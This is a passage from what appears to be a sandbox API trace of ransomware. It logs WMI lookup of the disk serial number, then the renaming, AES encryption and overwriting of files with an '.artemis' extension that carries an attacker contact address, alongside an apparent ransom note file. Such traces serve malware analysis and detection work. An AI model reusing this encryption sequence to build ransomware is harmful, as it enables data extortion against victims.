Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee5ec | out: ppvObject=0x6cee5ec*=0x67370e8) returned 0x0 [0203.190] WbemLocator:IUnknown:QueryInterface (in: This=0x67370e8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee5a8 | out: ppvObject=0x6cee5a8*=0x0) returned 0x80004002 [0203.190] WbemLocator:IUnknown:AddRef (This=0x67370e8) returned 0x3 [0203.190] WbemLocator:IUnknown:QueryInterface (in: This=0x67370e8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedf04 | out: ppvObject=0x6cedf04*=0x0) returned 0x80004002 [0203.190] WbemLocator:IUnknown:QueryInterface (in: This=0x67370e8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cedeb4 | out: ppvObject=0x6cedeb4*=0x0) returned 0x80004002 [0203.190] WbemLocator:IUnknown:QueryInterface (in: This=0x67370e8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cedec0 | out: ppvObject=0x6cedec0*=0x0) returned 0x80004002 [0203.190] CoGetContextToken (in: pToken=0x6cedf20 | out: pToken=0x6cedf20) returned 0x0 [0203.190] CoGetContextToken (in: pToken=0x6cee328 | out: pToken=0x6cee328) returned 0x0 [0203.190] WbemLocator:IUnknown:QueryInterface (in: This=0x67370e8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee3b8 | out: ppvObject=0x6cee3b8*=0x0) returned 0x80004002 [0203.191] WbemLocator:IUnknown:Release (This=0x67370e8) returned 0x2 [0203.191] WbemLocator:IUnknown:Release (This=0x67370e8) returned 0x1 [0203.191] CoGetContextToken (in: pToken=0x6cee998 | out: pToken=0x6cee998) returned 0x0 [0203.191] CoGetContextToken (in: pToken=0x6cee8f8 | out: pToken=0x6cee8f8) returned 0x0 [0203.191] WbemLocator:IUnknown:QueryInterface (in: This=0x67370e8, riid=0x6cee9c8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6cee9c4 | out: ppvObject=0x6cee9c4*=0x67370e8) returned 0x0 [0203.191] WbemLocator:IUnknown:AddRef (This=0x67370e8) returned 0x3 [0203.191] WbemLocator:IUnknown:Release (This=0x67370e8) returned 0x2 [0203.191] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738620, puCount=0x6ceeb5c | out: puCount=0x6ceeb5c*=0x2) returned 0x0 [0203.191] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=8, puBuffLength=0x6ceeb58*=0x0, pszText=0x0 | out: puBuffLength=0x6ceeb58*=0xf, pszText=0x0) returned 0x0 [0203.191] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=8, puBuffLength=0x6ceeb58*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceeb58*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0203.191] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6ceea34 | out: ppv=0x6ceea34*=0x6737028) returned 0x0 [0203.191] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6737028, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6ceeac8 | out: ppNamespace=0x6ceeac8*=0x67481b4) returned 0x0 [0204.339] WbemLocator:IUnknown:QueryInterface (in: This=0x67481b4, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee964 | out: ppvObject=0x6cee964*=0x781904) returned 0x0 [0204.339] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781904, pProxy=0x67481b4, pAuthnSvc=0x6cee9b4, pAuthzSvc=0x6cee9b0, pServerPrincName=0x6cee9a8, pAuthnLevel=0x6cee9ac, pImpLevel=0x6cee99c, pAuthInfo=0x6cee9a0, pCapabilites=0x6cee9a4 | out: pAuthnSvc=0x6cee9b4*=0xa, pAuthzSvc=0x6cee9b0*=0x0, pServerPrincName=0x6cee9a8, pAuthnLevel=0x6cee9ac*=0x6, pImpLevel=0x6cee99c*=0x2, pAuthInfo=0x6cee9a0, pCapabilites=0x6cee9a4*=0x1) returned 0x0 [0204.339] WbemLocator:IUnknown:Release (This=0x781904) returned 0x1 [0204.339] WbemLocator:IUnknown:QueryInterface (in: This=0x67481b4, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee958 | out: ppvObject=0x6cee958*=0x781924) returned 0x0 [0204.339] WbemLocator:IUnknown:QueryInterface (in: This=0x67481b4, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee954 | out: ppvObject=0x6cee954*=0x781904) returned 0x0 [0204.340] WbemLocator:IClientSecurity:SetBlanket (This=0x781904, pProxy=0x67481b4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0204.435] WbemLocator:IUnknown:Release (This=0x781904) returned 0x2 [0204.435] WbemLocator:IUnknown:Release (This=0x781924) returned 0x1 [0204.435] CoTaskMemFree (pv=0x77e0e8) [0204.435] WbemLocator:IUnknown:Release (This=0x6737028) returned 0x0 [0204.435] WbemLocator:IUnknown:QueryInterface (in: This=0x67481b4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee554 | out: ppvObject=0x6cee554*=0x781924) returned 0x0 [0204.435] WbemLocator:IUnknown:QueryInterface (in: This=0x781924, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee510 | out: ppvObject=0x6cee510*=0x0) returned 0x80004002 [0204.482] WbemLocator:IUnknown:QueryInterface (in: This=0x781924, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee32c | out: ppvObject=0x6cee32c*=0x0) returned 0x80004002 [0204.483] WbemLocator:IUnknown:AddRef (This=0x781924) returned 0x3 [0204.483] WbemLocator:IUnknown:QueryInterface (in: This=0x781924, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cede6c | out: ppvObject=0x6cede6c*=0x0) returned 0x80004002 [0204.484] WbemLocator:IUnknown:QueryInterface (in: This=0x781924, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cede1c | out: ppvObject=0x6cede1c*=0x0) returned 0x80004002 [0204.485] WbemLocator:IUnknown:QueryInterface (in: This=0x781924, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cede28 | out: ppvObject=0x6cede28*=0x781884) returned 0x0 [0204.485] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x781884, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6cede30 | out: pCid=0x6cede30*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0204.485] WbemLocator:IUnknown:Release (This=0x781884) returned 0x3 [0204.485] CoGetContextToken (in: pToken=0x6cede88 | out: pToken=0x6cede88) returned 0x0 [0204.485] CoGetContextToken (in: pToken=0x6cee290 | out: pToken=0x6cee290) returned 0x0 [0204.485] WbemLocator:IUnknown:QueryInterface (in: This=0x781924, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee320 | out: ppvObject=0x6cee320*=0x78190c) returned 0x0 [0204.485] WbemLocator:IRpcOptions:Query (in: This=0x78190c, pPrx=0x781924, dwProperty=2, pdwValue=0x6cee348 | out: pdwValue=0x6cee348) returned 0x80004002 [0204.485] WbemLocator:IUnknown:Release (This=0x78190c) returned 0x3 [0204.485] WbemLocator:IUnknown:Release (This=0x781924) returned 0x2 [0204.485] CoGetContextToken (in: pToken=0x6cee868 | out: pToken=0x6cee868) returned 0x0 [0204.485] CoGetContextToken (in: pToken=0x6cee7c8 | out: pToken=0x6cee7c8) returned 0x0 [0204.485] WbemLocator:IUnknown:QueryInterface (in: This=0x781924, riid=0x6cee898*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6cee894 | out: ppvObject=0x6cee894*=0x67481b4) returned 0x0 [0204.486] WbemLocator:IUnknown:AddRef (This=0x67481b4) returned 0x4 [0204.486] WbemLocator:IUnknown:Release (This=0x67481b4) returned 0x3 [0204.486] WbemLocator:IUnknown:Release (This=0x67481b4) returned 0x2 [0204.486] SysStringLen (param_1=0x0) returned 0x0 [0204.486] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738af0, puCount=0x6ceec2c | out: puCount=0x6ceec2c*=0x0) returned 0x0 [0204.486] WbemDefPath:IWbemPath:GetText (in: This=0x6738af0, lFlags=2, puBuffLength=0x6ceec28*=0x0, pszText=0x0 | out: puBuffLength=0x6ceec28*=0x20, pszText=0x0) returned 0x0 [0204.486] WbemDefPath:IWbemPath:GetText (in: This=0x6738af0, lFlags=2, puBuffLength=0x6ceec28*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ceec28*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0204.486] CoGetContextToken (in: pToken=0x6cee898 | out: pToken=0x6cee898) returned 0x0 [0204.486] WbemLocator:IUnknown:AddRef (This=0x781924) returned 0x3 [0204.486] WbemLocator:IUnknown:QueryInterface (in: This=0x781924, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee72c | out: ppvObject=0x6cee72c*=0x781924) returned 0x0 [0204.486] WbemLocator:IUnknown:Release (This=0x781924) returned 0x3 [0204.486] WbemLocator:IUnknown:Release (This=0x781924) returned 0x2 [0204.486] WbemDefPath:IWbemPath:GetText (in: This=0x6738af0, lFlags=2, puBuffLength=0x6ceec30*=0x0, pszText=0x0 | out: puBuffLength=0x6ceec30*=0x20, pszText=0x0) returned 0x0 [0204.486] WbemDefPath:IWbemPath:GetText (in: This=0x6738af0, lFlags=2, puBuffLength=0x6ceec30*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ceec30*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0204.486] IWbemServices:GetObject (in: This=0x67481b4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6ceebe4*=0x0, ppCallResult=0x0 | out: ppObject=0x6ceebe4*=0x673c128, ppCallResult=0x0) returned 0x0 [0204.732] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738620, puCount=0x6ceebe4 | out: puCount=0x6ceebe4*=0x2) returned 0x0 [0204.732] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=4, puBuffLength=0x6ceebe0*=0x0, pszText=0x0 | out: puBuffLength=0x6ceebe0*=0xf, pszText=0x0) returned 0x0 [0204.732] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=4, puBuffLength=0x6ceebe0*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceebe0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0204.732] IWbemClassObject:Get (in: This=0x673c128, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6ceebe0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3489dd8*=0, plFlavor=0x3489ddc*=0 | out: pVal=0x6ceebe0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3489dd8*=8, plFlavor=0x3489ddc*=0) returned 0x0 [0204.732] SysStringByteLen (bstr="9C354B42") returned 0x10 [0204.733] SysStringByteLen (bstr="9C354B42") returned 0x10 [0204.733] IWbemClassObject:Get (in: This=0x673c128, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6ceebe8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3489dd8*=8, plFlavor=0x3489ddc*=0 | out: pVal=0x6ceebe8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3489dd8*=8, plFlavor=0x3489ddc*=0) returned 0x0 [0204.733] SysStringByteLen (bstr="9C354B42") returned 0x10 [0204.733] SysStringByteLen (bstr="9C354B42") returned 0x10 [0204.733] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm", nBufferLength=0x105, lpBuffer=0x6cee7e8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm", lpFilePart=0x0) returned 0x34 [0204.733] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x6cee7e8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x5f [0204.733] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceec48) returned 1 [0204.733] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leesmij.htm"), fInfoLevelId=0x0, lpFileInformation=0x6ceecc4 | out: lpFileInformation=0x6ceecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x20a09880, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x4400)) returned 1 [0204.733] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceec44) returned 1 [0204.733] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leesmij.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leesmij.htm.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0204.734] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm", nBufferLength=0x105, lpBuffer=0x6cee88c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm", lpFilePart=0x0) returned 0x34 [0204.734] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm", nBufferLength=0x105, lpBuffer=0x6cee884, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm", lpFilePart=0x0) returned 0x34 [0204.735] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6cee88c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0204.735] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceecec) returned 1 [0204.735] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6ceed68 | out: lpFileInformation=0x6ceed68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x109b3760, ftCreationTime.dwHighDateTime=0x1d6a20b, ftLastAccessTime.dwLowDateTime=0x109b3760, ftLastAccessTime.dwHighDateTime=0x1d6a20b, ftLastWriteTime.dwLowDateTime=0x109b3760, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0204.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceece8) returned 1 [0204.735] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm", nBufferLength=0x105, lpBuffer=0x6cee808, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm", lpFilePart=0x0) returned 0x34 [0204.735] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceecb4) returned 1 [0204.735] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leggimi.htm"), fInfoLevelId=0x0, lpFileInformation=0x348a418 | out: lpFileInformation=0x348a418*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4289)) returned 1 [0204.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceecb0) returned 1 [0204.735] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm", nBufferLength=0x105, lpBuffer=0x6cee6f4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm", lpFilePart=0x0) returned 0x34 [0204.735] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceebe8) returned 1 [0204.736] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leggimi.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x348 [0204.736] GetFileType (hFile=0x348) returned 0x1 [0204.736] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceebe4) returned 1 [0204.736] GetFileType (hFile=0x348) returned 0x1 [0204.736] GetFileSize (in: hFile=0x348, lpFileSizeHigh=0x6ceecf0 | out: lpFileSizeHigh=0x6ceecf0*=0x0) returned 0x4289 [0204.965] ReadFile (in: hFile=0x348, lpBuffer=0x349cc28, nNumberOfBytesToRead=0x4289, lpNumberOfBytesRead=0x6ceec9c, lpOverlapped=0x0 | out: lpBuffer=0x349cc28*, lpNumberOfBytesRead=0x6ceec9c*=0x4289, lpOverlapped=0x0) returned 1 [0204.967] CloseHandle (hObject=0x348) returned 1 [0204.968] CryptAcquireContextW (in: phProv=0x6ceec3c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ceec3c*=0x7a94a8) returned 1 [0204.969] CryptGenRandom (in: hProv=0x7a94a8, dwLen=0x10, pbBuffer=0x34a1208 | out: pbBuffer=0x34a1208) returned 1 [0205.461] CryptImportKey (in: hProv=0x7a94a8, pbData=0x34103cc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6ceec0c | out: phKey=0x6ceec0c*=0x77aeb0) returned 1 [0205.461] CryptContextAddRef (hProv=0x7a94a8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0205.461] CryptContextAddRef (hProv=0x7a94a8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0205.461] CryptDuplicateKey (in: hKey=0x77aeb0, pdwReserved=0x0, dwFlags=0x0, phKey=0x6ceebfc | out: phKey=0x6ceebfc*=0x77b0b0) returned 1 [0205.461] CryptContextAddRef (hProv=0x7a94a8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0205.461] CryptSetKeyParam (hKey=0x77b0b0, dwParam=0x4, pbData=0x34104ac*=0x1, dwFlags=0x0) returned 1 [0205.461] CryptSetKeyParam (hKey=0x77b0b0, dwParam=0x1, pbData=0x3410478, dwFlags=0x0) returned 1 [0205.461] CryptEncrypt (in: hKey=0x77b0b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34104bc*, pdwDataLen=0x6ceec68*=0x4290, dwBufLen=0x4290 | out: pbData=0x34104bc*, pdwDataLen=0x6ceec68*=0x4290) returned 1 [0205.462] CryptEncrypt (in: hKey=0x77b0b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3414770*, pdwDataLen=0x6ceec70*=0x0, dwBufLen=0x10 | out: pbData=0x3414770*, pdwDataLen=0x6ceec70*=0x10) returned 1 [0205.464] CryptDestroyKey (hKey=0x77aeb0) returned 1 [0205.464] CryptReleaseContext (hProv=0x7a94a8, dwFlags=0x0) returned 1 [0205.464] CryptReleaseContext (hProv=0x7a94a8, dwFlags=0x0) returned 1 [0205.683] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm", nBufferLength=0x105, lpBuffer=0x6cee6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm", lpFilePart=0x0) returned 0x34 [0205.683] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceebd4) returned 1 [0205.683] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leggimi.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x348 [0205.683] GetFileType (hFile=0x348) returned 0x1 [0205.683] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceebd0) returned 1 [0205.683] GetFileType (hFile=0x348) returned 0x1 [0205.683] WriteFile (in: hFile=0x348, lpBuffer=0x3427f24*, nNumberOfBytesToWrite=0x44a0, lpNumberOfBytesWritten=0x6ceec90, lpOverlapped=0x0 | out: lpBuffer=0x3427f24*, lpNumberOfBytesWritten=0x6ceec90*=0x44a0, lpOverlapped=0x0) returned 1 [0205.684] CloseHandle (hObject=0x348) returned 1 [0205.686] CoTaskMemAlloc (cb=0x20c) returned 0x9831858 [0205.686] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x9831858 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0205.686] CoTaskMemFree (pv=0x9831858) [0205.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6cee6c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0205.686] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ceec10 | out: ppv=0x6ceec10*=0x72015c) returned 0x0 [0205.686] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6ceec08 | out: pAptType=0x6ceec08*=1) returned 0x0 [0205.686] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ceec0c | out: ppvObject=0x6ceec0c*=0x0) returned 0x80004002 [0205.686] IUnknown:Release (This=0x72015c) returned 0x1 [0205.687] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6cee578 | out: ppv=0x6cee578*=0x6736ec8) returned 0x0 [0205.687] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee790 | out: ppvObject=0x6cee790*=0x0) returned 0x80004002 [0205.687] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736ec8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee7a4 | out: ppvObject=0x6cee7a4*=0x67387e0) returned 0x0 [0205.687] WbemDefPath:IUnknown:Release (This=0x6736ec8) returned 0x0 [0205.687] WbemDefPath:IUnknown:QueryInterface (in: This=0x67387e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee3c4 | out: 